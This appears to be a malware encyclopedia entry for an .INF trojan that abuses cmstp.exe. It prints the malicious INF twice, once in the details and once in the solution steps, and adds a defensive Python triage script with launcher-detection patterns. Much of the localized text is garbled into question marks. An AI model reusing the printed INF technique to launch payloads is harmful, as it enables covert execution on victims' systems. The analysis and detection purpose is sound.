Analyzed by: Thea Patrice Tajonera

 :

INF/Agent.J trojan (NOD32)

 Platform:

Windows

 Overall risk rating:
 Damage potential:
 Distribution potential:
 Reported infections:
 Information exposure:

  • Malware type:
    Trojan

  • Destructive?:
    No

  • Encrypted?:
    No

  • In the Wild:
    Yes

  Overview

Infection channel: ???????

It arrives on a system as a file dropped by other malware or as a file downloaded unknowingly by users when visiting malicious sites.

????????,?????????

  Technical details

File size: 583 bytes
Report date: INF
Memory resident: No
Initial samples received date: January 7, 2021
Payload: ????
N

???????

It arrives on a system as a file dropped by other malware or as a file downloaded unknowingly by users when visiting malicious sites.

??

??? .INF ????????:

[version]
Signature=$chicago$
AdvancedINF=2.5

[DefaultInstall]
CustomDestination=CustInstDestSectionAllUsers

RunPreSetupCommands=RunPreSetupCommandsSection

[RunPreSetupCommandsSection]
; Commands Here will be run Before Setup Begins to install
cmd /c start "C:\Windows\temp\{Random Characters}.exe"
taskkill /IM cmstp.exe /F

[CustInstDestSectionAllUsers]
49000,49001=AllUSer_LDIDSection, 7

[AllUSer_LDIDSection]
"HKLM", "SOFTWARE\Microsoft\Windows\CurrentVersion\App Paths\CMMGR32.EXE", "ProfileInstallPath", "%UnexpectedError%", ""

[Strings]
ServiceName="Crimson"
ShortSvcName="Crimson"

??????

????????,??????????:

  • C:\Windows\temp\{Random Characters}.exe
  • taskkill /IM cmstp.exe /F
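The INF above is laid out as a Connection Manager profile (the `AdvancedINF` header, the `CustomDestination` pointing at the `App Paths\CMMGR32.EXE` key), which is the structure cmstp.exe accepts; what makes it malicious is the content of `RunPreSetupCommandsSection`, which launches a dropped executable from the temp folder and then kills cmstp.exe itself. The following triage script is an added example, not part of this Trend Micro entry and not the vendor's tooling. It parses INF text without configparser (INF command sections hold bare lines with no `=`), resolves the sections named by `RunPreSetupCommands`/`RunPostSetupCommands`, and flags the indicators a responder would act on. The INF body is reproduced from this page as a constructed sample, the benign sample and all regex patterns and function names are this example's own assumptions, and `scan_directory` is the piece that supports Step 2 of the solution (finding INF files that carry these strings).

```python
"""Triage helper for cmstp.exe-style .INF payloads (added example, not the page's code)."""
import os
import re
from typing import Dict, List, Tuple

# Constructed sample: the INF body shown in this report; {Random Characters} kept as given.
SAMPLE_INF = r"""
[version]
Signature=$chicago$
AdvancedINF=2.5

[DefaultInstall]
CustomDestination=CustInstDestSectionAllUsers
RunPreSetupCommands=RunPreSetupCommandsSection

[RunPreSetupCommandsSection]
; Commands Here will be run Before Setup Begins to install
cmd /c start "C:\Windows\temp\{Random Characters}.exe"
taskkill /IM cmstp.exe /F

[CustInstDestSectionAllUsers]
49000,49001=AllUSer_LDIDSection, 7

[AllUSer_LDIDSection]
"HKLM", "SOFTWARE\Microsoft\Windows\CurrentVersion\App Paths\CMMGR32.EXE", "ProfileInstallPath", "%UnexpectedError%", ""

[Strings]
ServiceName="Crimson"
ShortSvcName="Crimson"
"""

# Constructed benign sample (assumption): a profile whose pre-setup section runs nothing suspicious.
BENIGN_INF = r"""
[version]
Signature=$chicago$
[DefaultInstall]
RunPreSetupCommands=PreSection
[PreSection]
echo profile setup
"""

TEMP_PATH = re.compile(r"\\(windows\\)?temp\\", re.IGNORECASE)          # executable under a temp dir
KILL_CMSTP = re.compile(r"taskkill\b.*\bcmstp\.exe", re.IGNORECASE)       # installer terminating itself
LAUNCHER = re.compile(r"\b(cmd(\.exe)?\s+/c|start\b|powershell|rundll32|regsvr32|mshta)", re.IGNORECASE)


def parse_inf(text: str) -> Dict[str, List[str]]:
    """Return {section_name_lower: [non-comment, non-empty raw lines]}."""
    sections: Dict[str, List[str]] = {}
    current = None
    for raw in text.splitlines():
        line = raw.strip()
        if not line or line.startswith(";"):        # ';' starts an INF comment
            continue
        m = re.fullmatch(r"\[(.+?)\]", line)
        if m:
            current = m.group(1).lower()
            sections.setdefault(current, [])
        elif current is not None:
            sections[current].append(line)
    return sections


def command_sections(sections: Dict[str, List[str]]) -> List[str]:
    """Names of the sections cmstp.exe will execute, taken from [DefaultInstall]."""
    names = []
    for line in sections.get("defaultinstall", []):
        key, _, value = line.partition("=")
        if key.strip().lower() in ("runpresetupcommands", "runpostsetupcommands"):
            names.append(value.strip().lower())
    return names


def triage_inf(text: str) -> dict:
    """Classify one INF text; findings are (tag, offending line) pairs."""
    sections = parse_inf(text)
    findings: List[Tuple[str, str]] = []
    commands: List[str] = []
    for name in command_sections(sections):
        for cmd in sections.get(name, []):
            commands.append(cmd)
            if KILL_CMSTP.search(cmd):
                findings.append(("kills_cmstp", cmd))
            if TEMP_PATH.search(cmd):
                findings.append(("temp_path_exec", cmd))
            if LAUNCHER.search(cmd):
                findings.append(("shell_launcher", cmd))
    # The CMMGR32.EXE App Paths entry is the normal profile-installer layout; report it as
    # context only, since it is not malicious by itself.
    all_lines = " ".join(l for lines in sections.values() for l in lines).lower()
    return {
        "cmstp_profile_layout": "advancedinf" in " ".join(sections.get("version", [])).lower()
        and r"app paths\cmmgr32.exe" in all_lines,
        "commands": commands,
        "findings": findings,
        "verdict": "suspicious" if findings else "benign",
    }


def scan_directory(root: str) -> List[str]:
    """Walk a tree and return paths of .inf files whose commands trip the indicators."""
    hits = []
    for dirpath, _, files in os.walk(root):
        for fn in files:
            if fn.lower().endswith(".inf"):
                path = os.path.join(dirpath, fn)
                with open(path, "r", encoding="utf-8", errors="replace") as fh:
                    if triage_inf(fh.read())["verdict"] == "suspicious":
                        hits.append(path)
    return hits


if __name__ == "__main__":
    for tag, line in triage_inf(SAMPLE_INF)["findings"]:
        print(f"{tag:16} {line}")
```

The three findings on the sample (a shell launcher, an executable in the temp folder, and the taskkill of cmstp.exe) are exactly the lines listed in the report, so the verdict can be tied back to the vendor's description rather than to a bare string match. In a detection pipeline the same signal appears from the process side: cmstp.exe spawning cmd.exe or an executable from `C:\Windows\temp`, followed by taskkill targeting cmstp.exe.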

  Solution

Minimum scan engine: 9.800
First VSAPI pattern file: 16.462.06
First VSAPI pattern release date: January 7, 2021
VSAPI OPR pattern version: 16.463.00
VSAPI OPR pattern release date: January 8, 2021

Step 1

??Windows ME?XP??,????,????????????,??????????

Step 2

?????AUTORUN.INF??,?Trojan.INF.HIDDENTEAR.THAOGBA??,???????

[ More ]

[version]
Signature=$chicago$
AdvancedINF=2.5

[DefaultInstall]
CustomDestination=CustInstDestSectionAllUsers
RunPreSetupCommands=RunPreSetupCommandsSection

[RunPreSetupCommandsSection]
; Commands Here will be run Before Setup Begins to install
cmd /c start "C:\Windows\temp\{Random Characters}.exe"
taskkill /IM cmstp.exe /F

[CustInstDestSectionAllUsers]
49000,49001=AllUSer_LDIDSection, 7

[AllUSer_LDIDSection]
"HKLM", "SOFTWARE\Microsoft\Windows\CurrentVersion\App Paths\CMMGR32.EXE", "ProfileInstallPath", "%UnexpectedError%", ""

[Strings]
ServiceName="Crimson"
ShortSvcName="Crimson"

Step 3

?????????????,???????Trojan.INF.HIDDENTEAR.THAOGBA?? ????????????????????????,????????????????????????????????????????